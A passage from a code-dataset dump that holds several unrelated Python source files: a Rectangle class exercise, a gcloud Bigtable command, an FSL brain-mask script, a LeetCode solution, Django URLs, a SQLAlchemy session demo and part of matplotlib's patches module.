blob_id stringlengths 40–40 | directory_id stringlengths 40–40 | path stringlengths 3–616 | content_id stringlengths 40–40 | detected_licenses listlengths 0–112 | license_type stringclasses 2 values | repo_name stringlengths 5–115 | snapshot_id stringlengths 40–40 | revision_id stringlengths 40–40 | branch_name stringclasses 777 values | visit_date timestamp[us] 2015-08-06 10:31:46 – 2023-09-06 10:44:38 | revision_date timestamp[us] 1970-01-01 02:38:32 – 2037-05-03 13:00:00 | committer_date timestamp[us] 1970-01-01 02:38:32 – 2023-09-06 01:08:06 | github_id int64 4.92k–681M ⌀ | star_events_count int64 0–209k | fork_events_count int64 0–110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us] 2012-06-04 01:52:49 – 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us] 2008-05-22 07:58:19 – 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3–10.2M | extension stringclasses 188 values | content stringlengths 3–10.2M | authors listlengths 1–1 | author_id stringlengths 1–132 |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
defc4662ad24bac7f0c94489f4d8762a7b00ea29 | be7bb6d0cbdb27d3ff72830dc9cce41b170b27fe | /0x08-python-more_classes/7-rectangle.py | 07b740b4b98861329278958ae69a395ba2671045 | []
| no_license | camagar/holbertonschool-higher_level_programming | 21a8e7c2a2ad07c694c5443e174bb70502f910c2 | 97dd2fade6fb64ac7d9c52e412c0b8c1b8dfc3de | refs/heads/master | 2023-04-07T21:38:00.071687 | 2021-04-14T02:11:42 | 2021-04-14T02:11:42 | 291,889,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | #!/usr/bin/python3
"""create a class"""
class Rectangle(object):
"""define the rectangle class"""
number_of_instances = 0
print_symbol = "#"
def __init__(self, width=0, height=0):
self.width = width
self.height = height
Rectangle.number_of_instances += 1
@property
def width(self):
"""Get the width of the rectangle."""
return self.__width
@property
def height(self):
"""Get the height of the rectangle."""
return self.__height
@width.setter
def width(self, value):
"""width setter"""
if type(value) is not int:
raise TypeError('width must be an integer')
if value < 0:
raise ValueError('width must be >= 0')
self.__width = value
@height.setter
def height(self, value):
"""height setter"""
if type(value) is not int:
raise TypeError('height must be an integer')
if value < 0:
raise ValueError('height must be >= 0')
self.__height = value
def area(self):
"""Return the area of the rectangle."""
return self.__width * self.__height
def perimeter(self):
"""Return the perimeter, or 0 if width or height is 0."""
if self.__width == 0 or self.__height == 0:
return 0
else:
p = (self.__width * 2) + (self.__height * 2)
return p
def __str__(self):
"""Return the rectangle drawn with the print_symbol character."""
print_rectangle = ""
if self.__width == 0 or self.__height == 0:
return print_rectangle
else:
for i in range(0, self.__height):
for j in range(0, self.__width):
print_rectangle += str(self.print_symbol)
if i != (self.__height - 1):
print_rectangle += "\n"
return print_rectangle
def __repr__(self):
"""Return a string able to recreate the rectangle via eval()."""
rectangle_repr = 'Rectangle(' + str(self.__width) + ', ' +\
str(self.__height) + ')'
return rectangle_repr
def __del__(self):
"""del instance"""
print("Bye rectangle...")
Rectangle.number_of_instances -= 1
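# --- Editor's sketch (not part of the original exercise file): a quick
# interactive check of the class defined above.
# >>> r = Rectangle(2, 3)
# >>> r.area()
# 6
# >>> r.perimeter()
# 10
# >>> print(r)
# ##
# ##
# ##
# >>> Rectangle.number_of_instances
# 1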
| [
"[email protected]"
]
| |
4ca2f6e5a50c697732e41ef7847d7a9e32d0c8ef | d83fde3c891f44014f5339572dc72ebf62c38663 | /_bin/google-cloud-sdk/.install/.backup/lib/surface/bigtable/clusters/list.py | 22a4d818ffea8110f2f7395f31ce3f059c5b9a3d | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
]
| permissive | gyaresu/dotfiles | 047cc3ca70f4b405ba272856c69ee491a79d2ebe | e5e533b3a081b42e9492b228f308f6833b670cfe | refs/heads/master | 2022-11-24T01:12:49.435037 | 2022-11-01T16:58:13 | 2022-11-01T16:58:13 | 17,139,657 | 1 | 1 | null | 2020-07-25T14:11:43 | 2014-02-24T14:59:59 | Python | UTF-8 | Python | false | false | 2,944 | py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""bigtable clusters list command."""
from __future__ import absolute_import
from __future__ import unicode_literals
from apitools.base.py import list_pager
from googlecloudsdk.api_lib.bigtable import util
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.bigtable import arguments
from googlecloudsdk.core import resources
def _GetUriFunction(resource):
return resources.REGISTRY.ParseRelativeName(
resource.name,
collection='bigtableadmin.projects.instances.clusters').SelfLink()
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class ListClusters(base.ListCommand):
"""List existing Bigtable clusters.
List existing Bigtable clusters.
## EXAMPLES
To list all clusters in an instance, run:
$ {command} --instances INSTANCE_NAME
To list all clusters in any of several instances, run:
$ {command} --instances INSTANCE_NAME1,INSTANCE_NAME2
"""
@staticmethod
def Args(parser):
"""Register flags for this command."""
arguments.AddInstancesResourceArg(parser, 'to list clusters for')
parser.display_info.AddFormat("""
table(
name.segment(3):sort=1:label=INSTANCE,
name.basename():sort=2:label=NAME,
location.basename():label=ZONE,
serveNodes:label=NODES,
defaultStorageType:label=STORAGE,
state
)
""")
parser.display_info.AddUriFunc(_GetUriFunction)
parser.display_info.AddCacheUpdater(arguments.InstanceCompleter)
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Yields:
Some value that we want to have printed later.
"""
cli = util.GetAdminClient()
instance_refs = args.CONCEPTS.instances.Parse()
if not args.IsSpecified('instances'):
instance_refs = [util.GetInstanceRef('-')]
for instance_ref in instance_refs:
msg = (
util.GetAdminMessages()
.BigtableadminProjectsInstancesClustersListRequest(
parent=instance_ref.RelativeName()))
for cluster in list_pager.YieldFromList(
cli.projects_instances_clusters,
msg,
field='clusters',
batch_size_attribute=None):
yield cluster
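# --- Editor's note (an assumed invocation, inferred from the BETA release
# track and this file's surface path, not taken from the SDK docs):
# $ gcloud beta bigtable clusters list --instances my-instance
# The output columns follow the table() format declared in Args above:
# INSTANCE, NAME, ZONE, NODES, STORAGE, STATE.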
| [
"[email protected]"
]
| |
a109f4af2496f8cf2193422014e3bebe1bfb2884 | efd81a5e287a398aaa5333e949d6ca40b1544053 | /config/52_niak_centrality/00_gen_group_mask.py | 0070a89bd229cbbe1bfd58a95fbcfb6571a9160d | []
| no_license | fitrialif/abide-1 | 82d80bf52cd9b36072985a1ddeacfb325791566e | 9ccc45f612a58dbc3cf5fa3b70c41bcfeabd8ddc | refs/heads/master | 2020-04-25T15:13:22.974634 | 2014-03-10T18:18:42 | 2014-03-10T18:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,892 | py | #!/usr/bin/env python
from __future__ import print_function
import os, yaml
from os import path as op
def run(cmd):
print(cmd)
os.system(cmd)
# First read in a quick pack file with all the paths
fn = "/home2/data/Projects/ABIDE_Initiative/CPAC/abide/config/50_niak/quick_pack_run1_nofilt_noglobal.yml"
subinfo = yaml.load(open(fn, 'r'))
# Second extract paths to the masks in standard space
masks = [ si['functional_brain_mask_to_standard']['run1'] for si in subinfo ]
for mask in masks:
if not op.exists(mask):
print("missing: %s" % mask)
# Third combine the masks
cmd = "fslmerge -t combined_masks.nii.gz %s" % ' '.join(masks)
print(cmd, file=open("tmp.cmd", "w")) # for some reason, running it directly doesn't work
run("bash tmp.cmd")
# Fourth, build the 90% and 100% overlap masks
odir = "/home2/data/Projects/ABIDE_Initiative/CPAC/abide/templates/masks"
cmd = "fslmaths combined_masks.nii.gz -Tmean -thr 0.9 -bin %s/mask_niak_90percent.nii.gz" % odir
run(cmd)
cmd = "fslmaths combined_masks.nii.gz -Tmean -thr 1 -bin %s/mask_niak_100percent.nii.gz" % odir
run(cmd)
# Fifth get the grey matter mask into the same space as niak's data
odir = "/home2/data/Projects/ABIDE_Initiative/CPAC/abide/templates/masks"
cmd = "cd %s; 3dresample -input MNI152_T1_GREY_3mm_25pc_mask.nii.gz -master mask_niak_90percent.nii.gz -prefix MNI152_T1_GREY_3mm_25pc_mask_niak.nii.gz -rmode NN" % odir
run(cmd)
# Sixth, combine the percent masks with the grey matter mask
odir = "/home2/data/Projects/ABIDE_Initiative/CPAC/abide/templates/masks"
cmd = "cd %s; fslmaths %s -mas %s %s" % (odir, "mask_niak_90percent.nii.gz", "MNI152_T1_GREY_3mm_25pc_mask_niak.nii.gz", "mask_niak_90percent_gm.nii.gz")
run(cmd)
cmd = "cd %s; fslmaths %s -mas %s %s" % (odir, "mask_niak_100percent.nii.gz", "MNI152_T1_GREY_3mm_25pc_mask_niak.nii.gz", "mask_niak_100percent_gm.nii.gz")
run(cmd)
| [
"[email protected]"
]
| |
1a084933a4396b2d4ac47a77e5b0c1463ab35b6f | 286a49d0360ee2eb718dd9a496be88555cef3227 | /229. 求众数 II.py | feeac888d4a69cfbebe04caeb6b8e78a73040e78 | []
| no_license | NaiveteYaYa/data-structrue | 0618ab6bb7accc99c40e39a3ca60bbc0a9723c2f | a376863c1a8e007efafd5c1ed84929a80321b1b9 | refs/heads/master | 2023-07-02T03:15:33.523855 | 2021-08-14T02:02:07 | 2021-08-14T02:02:07 | 395,857,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,043 | py | # -*- coding: utf-8 -*-
# @Time : 2020/4/2 14:20
# @Author : WuxieYaYa
"""
给定一个大小为 n 的数组,找出其中所有出现超过 ⌊ n/3 ⌋ 次的元素。
说明: 要求算法的时间复杂度为 O(n),空间复杂度为 O(1)。
示例 1:
输入: [3,2,3]
输出: [3]
示例 2:
输入: [1,1,1,3,3,2,2,2]
输出: [1,2]
链接:https://leetcode-cn.com/problems/majority-element-ii
摩尔投票法的简单理解
与169. 多数元素的两点区别:
“多数”是指超过n/3,不是n/2,因此最多会有两个元素是众数,要建立两个candidate
题目没保证多数元素一定存在,所以最后要对candidate进行检验。因此整个流程分为两步:step1投票阶段,step2检验阶段。
算法核心:
对于候选者cand1和cand2:
如果投cand1,cand1加一票。
如果投cand2,cand2加一票。
如果投其他元素,cand1和cand2各减一票。
理解方法:
在169. 多数元素中,
如果candidate是多数元素,那么多数元素(>n/2)与其他元素之和(< n/2)对抗,一定赢。
如果candidate不是多数元素,那么该元素(< n/2)与多数元素和其他元素之和(>n/2)对抗,一定会被打败。
本题中,分为A``B``others三个阵营
如果此刻candidate是A和B,那么A(>n/3)与others(<n/3)对抗稳赢,B(>n/3)与others(<n/3)对抗稳赢。
如果此刻candidate是A和C(C来自others),那么B``C一定是对抗不了B的。
时间复杂度O(n),空间复杂度O(1)
作者:coldme-2
链接:https://leetcode-cn.com/problems/majority-element-ii/solution/mo-er-tou-piao-fa-de-jian-dan-li-jie-by-coldme-2/
"""
def majorityElement(nums):
# cand1, vote1 = None, 0
# cand2, vote2 = None, 0
# for i in range(len(nums)):
# if cand1 is None and cand2 != nums[i]:
# cand1 = nums[i]
# vote1 += 1
#
# elif cand2 is None and cand1 != nums[i]:
# cand2 = nums[i]
# vote2 += 1
#
# else:
# if cand1 == nums[i]:
# vote1 += 1
#
# elif cand2 == nums[i]:
# vote2 += 1
#
# else:
# vote1 -= 1
# vote2 -= 1
# if vote1 == 0:
# cand1 = None
# if vote2 == 0:
# cand2 = None
#
#
# vote1, vote2 = 0, 0
# for num in nums:
# if num == cand1:
# vote1 += 1
# if num == cand2:
# vote2 += 1
#
# ans = []
# if vote1> len(nums)//3:
# ans.append(cand1)
# if vote2 > len(nums)//3:
# ans.append(cand2)
#
# return ans
# Count-based alternative: simple, but list.count makes it O(n*k) time,
# not the O(n)/O(1) voting approach explained above.
n = len(nums)
ans = []
for i in set(nums):
if nums.count(i) > n//3:
ans.append(i)
return ans
if __name__ == '__main__':
print(majorityElement([1,1,1,3,3,2,2,2]))
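# --- Editor's sketch: a working version of the two-candidate Boyer-Moore
# voting described in the docstring above (the function name is my own);
# O(n) time and O(1) extra space, unlike the count-based variant used above.
def majority_element_voting(nums):
    # Phase 1: voting. At most two values can exceed n/3 occurrences.
    cand1, cand2, vote1, vote2 = None, None, 0, 0
    for n in nums:
        if n == cand1:
            vote1 += 1
        elif n == cand2:
            vote2 += 1
        elif vote1 == 0:
            cand1, vote1 = n, 1
        elif vote2 == 0:
            cand2, vote2 = n, 1
        else:
            vote1 -= 1
            vote2 -= 1
    # Phase 2: verification, because majority elements may not exist.
    return [c for c in (cand1, cand2)
            if c is not None and nums.count(c) > len(nums) // 3]


print(majority_element_voting([1, 1, 1, 3, 3, 2, 2, 2]))  # -> [1, 2]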
| [
"[email protected]"
]
| |
9b4bfa3a8c824efe83f17773632977134e891853 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/40/usersdata/68/18502/submittedfiles/main.py | 9b3141f2cb1df838fab5b35110951b9ec577eca6 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,041 | py | # -*- coding: utf-8 -*-
from __future__ import division
import funcoes
# START HERE
def fatorial (m):
m_fat=1
for i in range (2,m+1,1):
m_fat=m_fat * i
return m_fat
m=int(input('Digite m:'))
e=float(input('Digite o epsilon para o cosseno:'))
# double calcula_valor_absoluto: take the absolute value of m
if m<0:
m=m*(-1)
# double calcula_pi: approximate pi with the alternating series 3 + 4/(2*3*4) - 4/(4*5*6) + ...
soma_pi=0
j=2
for i in range (0,m,1):
if i%2==0:
soma_pi=soma_pi+(4/(j*(j+1)*(j+2)))
else:
soma_pi=soma_pi-(4/(j*(j+1)*(j+2)))
j=j+2
pi=3+soma_pi
# double calcula_cosseno: Taylor series for cos(pi/5), term by term
soma_cosseno=0
i=1
j=2
# NAME THE NEXT TERM OF SOMA_COSSENO WITH A VARIABLE:
'''
a = (((pi/5)**j)/fatorial(j)), and the loop only repeats while a is still
greater than or equal to epsilon
'''
a=(((pi/5)**j)/fatorial (j))
while a>=e:
if i%2!=0:
soma_cosseno = soma_cosseno + a
else:
soma_cosseno = soma_cosseno - a
j=j+2
i=i+1
cosseno=1-soma_cosseno
# double calcula_razao_aurea: golden ratio = 2*cos(pi/5)
razaoAurea= 2*cosseno
print('%.15f' %pi)
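# --- Editor's sketch (not part of the submission): cross-check against the
# closed form, since 2*cos(pi/5) is exactly the golden ratio (1+sqrt(5))/2.
import math
assert abs(2 * math.cos(math.pi / 5) - (1 + math.sqrt(5)) / 2) < 1e-12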
print('%.15f' %razaoAurea) | [
"[email protected]"
]
| |
5e8e3c2e021324492b3bddcc3682d341a0a778d6 | 4946fa19e840aafb7b3ed4ae159764af44c0ff34 | /pages/urls.py | fd2b01a536ecda7eb1db9d3615cd50bf4701a964 | []
| no_license | palmman/pedshop | c804be2fa8d1a7ce49c86c433a9bb00731146811 | 74aa002272e286e220e1e66fb701209ce9a055a6 | refs/heads/main | 2023-04-18T00:10:59.525763 | 2021-04-28T05:51:38 | 2021-04-28T05:51:38 | 362,352,612 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='home'),
path('shop', views.shop, name='shop'),
path('about', views.about, name='about'),
path('contact', views.contact, name='contact'),
path('<int:id>', views.product, name='product'),
path('category/<slug:pages_slug>/', views.shop, name='products_by_category'),
]
| [
"[email protected]"
]
| |
912d1cc8bfd900d2efb1333cf76904f99bd70ae4 | e34cbf5fce48f661d08221c095750240dbd88caf | /python/day42_sqlalchemy/4.0.scoped_session.py | b723853a14b95b576bc03df5c3d1d10b7857df60 | []
| no_license | willianflasky/growup | 2f994b815b636e2582594375e90dbcb2aa37288e | 1db031a901e25bbe13f2d0db767cd28c76ac47f5 | refs/heads/master | 2023-01-04T13:13:14.191504 | 2020-01-12T08:11:41 | 2020-01-12T08:11:41 | 48,899,304 | 2 | 0 | null | 2022-12-26T19:46:22 | 2016-01-02T05:04:39 | C | UTF-8 | Python | false | false | 1,295 | py | #!/usr/bin/env python
# -*-coding:utf8-*-
# date: 2018/2/23 上午11:45
__author__ = "willian"
import time
import threading
import datetime
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, ForeignKey, UniqueConstraint, Index
from sqlalchemy.orm import sessionmaker, relationship, scoped_session
from sqlalchemy import create_engine
from sqlalchemy.sql import text
engine = create_engine("mysql+pymysql://s6:[email protected]:3306/s6", max_overflow=0, pool_size=5)
Session = sessionmaker(bind=engine)
# Option 1: a plain sessionmaker Session cannot be shared across threads,
# so during development each thread has to create its own session.
# The session itself carries the database methods: close, commit, execute...
# session = Session()
# session.close()
# Option 2: scoped_session is thread-safe and keeps one session per thread
# - backed by threading.local
# - keyed by a unique identifier (the thread)
# Source-code walkthrough, step 1: cmd+click to jump into scoped_session
session = scoped_session(Session)
session.remove()
"""
session = scoped_session(Session)
session中两个值
1. self.session_factory
2. self.registry 中又有两个值, 加括号创建session
1> self.registry.self.session_factory(createfunc)
2> self.registry.self.registry(没有写错)
""" | [
"[email protected]"
]
| |
2a29dc528d6fecc104cb427a3bf075c0acb82089 | c2df9e04adec78e789d1fbdb0711c45e5b9263a7 | /venv/Lib/site-packages/matplotlib/patches.py | 9cbba65bbb9b007fbf470b1681f317385db6d8e6 | [
"MIT",
"BSD-3-Clause"
]
| permissive | AdarshSai/Final_Project | 433009a2f416e894ee3be85cd9317cb8e8df5516 | f966834ca72dd232102ed500ef47ef2b3bdbed5b | refs/heads/main | 2023-01-23T12:21:41.342074 | 2020-11-19T22:24:15 | 2020-11-19T22:24:15 | 308,898,012 | 0 | 1 | MIT | 2020-11-19T22:24:17 | 2020-10-31T14:19:58 | Python | UTF-8 | Python | false | false | 153,320 | py | import contextlib
import functools
import inspect
import math
from numbers import Number
import textwrap
import numpy as np
import matplotlib as mpl
from . import artist, cbook, colors, docstring, lines as mlines, transforms
from .bezier import (
NonIntersectingPathException, get_cos_sin, get_intersection,
get_parallels, inside_circle, make_wedged_bezier2,
split_bezier_intersecting_with_closedpath, split_path_inout)
from .path import Path
@cbook._define_aliases({
"antialiased": ["aa"],
"edgecolor": ["ec"],
"facecolor": ["fc"],
"linestyle": ["ls"],
"linewidth": ["lw"],
})
class Patch(artist.Artist):
"""
A patch is a 2D artist with a face color and an edge color.
If any of *edgecolor*, *facecolor*, *linewidth*, or *antialiased*
are *None*, they default to their rc params setting.
"""
zorder = 1
validCap = mlines.Line2D.validCap
validJoin = mlines.Line2D.validJoin
# Whether to draw an edge by default. Set on a
# subclass-by-subclass basis.
_edge_default = False
def __init__(self,
edgecolor=None,
facecolor=None,
color=None,
linewidth=None,
linestyle=None,
antialiased=None,
hatch=None,
fill=True,
capstyle=None,
joinstyle=None,
**kwargs):
"""
The following kwarg properties are supported
%(Patch)s
"""
artist.Artist.__init__(self)
if linewidth is None:
linewidth = mpl.rcParams['patch.linewidth']
if linestyle is None:
linestyle = "solid"
if capstyle is None:
capstyle = 'butt'
if joinstyle is None:
joinstyle = 'miter'
if antialiased is None:
antialiased = mpl.rcParams['patch.antialiased']
self._hatch_color = colors.to_rgba(mpl.rcParams['hatch.color'])
self._fill = True # needed for set_facecolor call
if color is not None:
if edgecolor is not None or facecolor is not None:
cbook._warn_external(
"Setting the 'color' property will override "
"the edgecolor or facecolor properties.")
self.set_color(color)
else:
self.set_edgecolor(edgecolor)
self.set_facecolor(facecolor)
# unscaled dashes. Needed to scale dash patterns by lw
self._us_dashes = None
self._linewidth = 0
self.set_fill(fill)
self.set_linestyle(linestyle)
self.set_linewidth(linewidth)
self.set_antialiased(antialiased)
self.set_hatch(hatch)
self.set_capstyle(capstyle)
self.set_joinstyle(joinstyle)
if len(kwargs):
self.update(kwargs)
def get_verts(self):
"""
Return a copy of the vertices used in this patch.
If the patch contains Bezier curves, the curves will be interpolated by
line segments. To access the curves as curves, use `get_path`.
"""
trans = self.get_transform()
path = self.get_path()
polygons = path.to_polygons(trans)
if len(polygons):
return polygons[0]
return []
def _process_radius(self, radius):
if radius is not None:
return radius
if isinstance(self._picker, Number):
_radius = self._picker
else:
if self.get_edgecolor()[3] == 0:
_radius = 0
else:
_radius = self.get_linewidth()
return _radius
def contains(self, mouseevent, radius=None):
"""
Test whether the mouse event occurred in the patch.
Returns
-------
(bool, empty dict)
"""
inside, info = self._default_contains(mouseevent)
if inside is not None:
return inside, info
radius = self._process_radius(radius)
codes = self.get_path().codes
if codes is not None:
vertices = self.get_path().vertices
# if the current path is concatenated by multiple sub paths.
# get the indexes of the starting code(MOVETO) of all sub paths
idxs, = np.where(codes == Path.MOVETO)
# Don't split before the first MOVETO.
idxs = idxs[1:]
subpaths = map(
Path, np.split(vertices, idxs), np.split(codes, idxs))
else:
subpaths = [self.get_path()]
inside = any(
subpath.contains_point(
(mouseevent.x, mouseevent.y), self.get_transform(), radius)
for subpath in subpaths)
return inside, {}
def contains_point(self, point, radius=None):
"""
Return whether the given point is inside the patch.
Parameters
----------
point : (float, float)
The point (x, y) to check, in target coordinates of
``self.get_transform()``. These are display coordinates for patches
that are added to a figure or axes.
radius : float, optional
Add an additional margin on the patch in target coordinates of
``self.get_transform()``. See `.Path.contains_point` for further
details.
Returns
-------
bool
Notes
-----
The proper use of this method depends on the transform of the patch.
Isolated patches do not have a transform. In this case, the patch
creation coordinates and the point coordinates match. The following
example checks that the center of a circle is within the circle
>>> center = 0, 0
>>> c = Circle(center, radius=1)
>>> c.contains_point(center)
True
The convention of checking against the transformed patch stems from
the fact that this method is predominantly used to check if display
coordinates (e.g. from mouse events) are within the patch. If you want
to do the above check with data coordinates, you have to properly
transform them first:
>>> center = 0, 0
>>> c = Circle(center, radius=1)
>>> plt.gca().add_patch(c)
>>> transformed_center = c.get_transform().transform(center)
>>> c.contains_point(transformed_center)
True
"""
radius = self._process_radius(radius)
return self.get_path().contains_point(point,
self.get_transform(),
radius)
def contains_points(self, points, radius=None):
"""
Return whether the given points are inside the patch.
Parameters
----------
points : (N, 2) array
The points to check, in target coordinates of
``self.get_transform()``. These are display coordinates for patches
that are added to a figure or axes. Columns contain x and y values.
radius : float, optional
Add an additional margin on the patch in target coordinates of
``self.get_transform()``. See `.Path.contains_point` for further
details.
Returns
-------
length-N bool array
Notes
-----
The proper use of this method depends on the transform of the patch.
See the notes on `.Patch.contains_point`.
"""
radius = self._process_radius(radius)
return self.get_path().contains_points(points,
self.get_transform(),
radius)
def update_from(self, other):
# docstring inherited.
artist.Artist.update_from(self, other)
# For some properties we don't need or don't want to go through the
# getters/setters, so we just copy them directly.
self._edgecolor = other._edgecolor
self._facecolor = other._facecolor
self._original_edgecolor = other._original_edgecolor
self._original_facecolor = other._original_facecolor
self._fill = other._fill
self._hatch = other._hatch
self._hatch_color = other._hatch_color
# copy the unscaled dash pattern
self._us_dashes = other._us_dashes
self.set_linewidth(other._linewidth) # also sets dash properties
self.set_transform(other.get_data_transform())
# If the transform of other needs further initialization, then it will
# be the case for this artist too.
self._transformSet = other.is_transform_set()
def get_extents(self):
"""
Return the `Patch`'s axis-aligned extents as a `~.transforms.Bbox`.
"""
return self.get_path().get_extents(self.get_transform())
def get_transform(self):
"""Return the `~.transforms.Transform` applied to the `Patch`."""
return self.get_patch_transform() + artist.Artist.get_transform(self)
def get_data_transform(self):
"""
Return the `~.transforms.Transform` mapping data coordinates to
physical coordinates.
"""
return artist.Artist.get_transform(self)
def get_patch_transform(self):
"""
Return the `~.transforms.Transform` instance mapping patch coordinates
to data coordinates.
For example, one may define a patch of a circle which represents a
radius of 5 by providing coordinates for a unit circle, and a
transform which scales the coordinates (the patch coordinate) by 5.
"""
return transforms.IdentityTransform()
def get_antialiased(self):
"""Return whether antialiasing is used for drawing."""
return self._antialiased
def get_edgecolor(self):
"""Return the edge color."""
return self._edgecolor
def get_facecolor(self):
"""Return the face color."""
return self._facecolor
def get_linewidth(self):
"""Return the line width in points."""
return self._linewidth
def get_linestyle(self):
"""Return the linestyle."""
return self._linestyle
def set_antialiased(self, aa):
"""
Set whether to use antialiased rendering.
Parameters
----------
b : bool or None
"""
if aa is None:
aa = mpl.rcParams['patch.antialiased']
self._antialiased = aa
self.stale = True
def _set_edgecolor(self, color):
set_hatch_color = True
if color is None:
if (mpl.rcParams['patch.force_edgecolor'] or
not self._fill or self._edge_default):
color = mpl.rcParams['patch.edgecolor']
else:
color = 'none'
set_hatch_color = False
self._edgecolor = colors.to_rgba(color, self._alpha)
if set_hatch_color:
self._hatch_color = self._edgecolor
self.stale = True
def set_edgecolor(self, color):
"""
Set the patch edge color.
Parameters
----------
color : color or None or 'auto'
"""
self._original_edgecolor = color
self._set_edgecolor(color)
def _set_facecolor(self, color):
if color is None:
color = mpl.rcParams['patch.facecolor']
alpha = self._alpha if self._fill else 0
self._facecolor = colors.to_rgba(color, alpha)
self.stale = True
def set_facecolor(self, color):
"""
Set the patch face color.
Parameters
----------
color : color or None
"""
self._original_facecolor = color
self._set_facecolor(color)
def set_color(self, c):
"""
Set both the edgecolor and the facecolor.
Parameters
----------
c : color
See Also
--------
Patch.set_facecolor, Patch.set_edgecolor
For setting the edge or face color individually.
"""
self.set_facecolor(c)
self.set_edgecolor(c)
def set_alpha(self, alpha):
# docstring inherited
super().set_alpha(alpha)
self._set_facecolor(self._original_facecolor)
self._set_edgecolor(self._original_edgecolor)
# stale is already True
def set_linewidth(self, w):
"""
Set the patch linewidth in points.
Parameters
----------
w : float or None
"""
if w is None:
w = mpl.rcParams['patch.linewidth']
if w is None:
w = mpl.rcParams['axes.linewidth']
self._linewidth = float(w)
# scale the dash pattern by the linewidth
offset, ls = self._us_dashes
self._dashoffset, self._dashes = mlines._scale_dashes(
offset, ls, self._linewidth)
self.stale = True
def set_linestyle(self, ls):
"""
Set the patch linestyle.
=========================== =================
linestyle description
=========================== =================
``'-'`` or ``'solid'`` solid line
``'--'`` or ``'dashed'`` dashed line
``'-.'`` or ``'dashdot'`` dash-dotted line
``':'`` or ``'dotted'`` dotted line
=========================== =================
Alternatively a dash tuple of the following form can be provided::
(offset, onoffseq)
where ``onoffseq`` is an even length tuple of on and off ink in points.
Parameters
----------
ls : {'-', '--', '-.', ':', '', (offset, on-off-seq), ...}
The line style.
"""
if ls is None:
ls = "solid"
self._linestyle = ls
# get the unscaled dash pattern
offset, ls = self._us_dashes = mlines._get_dash_pattern(ls)
# scale the dash pattern by the linewidth
self._dashoffset, self._dashes = mlines._scale_dashes(
offset, ls, self._linewidth)
self.stale = True
def set_fill(self, b):
"""
Set whether to fill the patch.
Parameters
----------
b : bool
"""
self._fill = bool(b)
self._set_facecolor(self._original_facecolor)
self._set_edgecolor(self._original_edgecolor)
self.stale = True
def get_fill(self):
"""Return whether the patch is filled."""
return self._fill
# Make fill a property so as to preserve the long-standing
# but somewhat inconsistent behavior in which fill was an
# attribute.
fill = property(get_fill, set_fill)
def set_capstyle(self, s):
"""
Set the capstyle.
Parameters
----------
s : {'butt', 'round', 'projecting'}
"""
mpl.rcsetup.validate_capstyle(s)
self._capstyle = s
self.stale = True
def get_capstyle(self):
"""Return the capstyle."""
return self._capstyle
def set_joinstyle(self, s):
"""
Set the joinstyle.
Parameters
----------
s : {'miter', 'round', 'bevel'}
"""
mpl.rcsetup.validate_joinstyle(s)
self._joinstyle = s
self.stale = True
def get_joinstyle(self):
"""Return the joinstyle."""
return self._joinstyle
def set_hatch(self, hatch):
r"""
Set the hatching pattern.
*hatch* can be one of::
/ - diagonal hatching
\ - back diagonal
| - vertical
- - horizontal
+ - crossed
x - crossed diagonal
o - small circle
O - large circle
. - dots
* - stars
Letters can be combined, in which case all the specified
hatchings are done. If same letter repeats, it increases the
density of hatching of that pattern.
Hatching is supported in the PostScript, PDF, SVG and Agg
backends only.
Parameters
----------
hatch : {'/', '\\', '|', '-', '+', 'x', 'o', 'O', '.', '*'}
"""
self._hatch = hatch
self.stale = True
def get_hatch(self):
"""Return the hatching pattern."""
return self._hatch
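# --- Editor's sketch: hatch strings combine and repeat, per the table in
# set_hatch above (Rectangle is defined later in this module).
# >>> Rectangle((0, 0), 4, 2, hatch='/', fill=False)    # sparse diagonals
# >>> Rectangle((0, 0), 4, 2, hatch='//x', fill=False)  # denser, plus crosses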
@contextlib.contextmanager
def _bind_draw_path_function(self, renderer):
"""
``draw()`` helper factored out for sharing with `FancyArrowPatch`.
Yields a callable ``dp`` such that calling ``dp(*args, **kwargs)`` is
equivalent to calling ``renderer1.draw_path(gc, *args, **kwargs)``
where ``renderer1`` and ``gc`` have been suitably set from ``renderer``
and the artist's properties.
"""
renderer.open_group('patch', self.get_gid())
gc = renderer.new_gc()
gc.set_foreground(self._edgecolor, isRGBA=True)
lw = self._linewidth
if self._edgecolor[3] == 0:
lw = 0
gc.set_linewidth(lw)
gc.set_dashes(self._dashoffset, self._dashes)
gc.set_capstyle(self._capstyle)
gc.set_joinstyle(self._joinstyle)
gc.set_antialiased(self._antialiased)
self._set_gc_clip(gc)
gc.set_url(self._url)
gc.set_snap(self.get_snap())
gc.set_alpha(self._alpha)
if self._hatch:
gc.set_hatch(self._hatch)
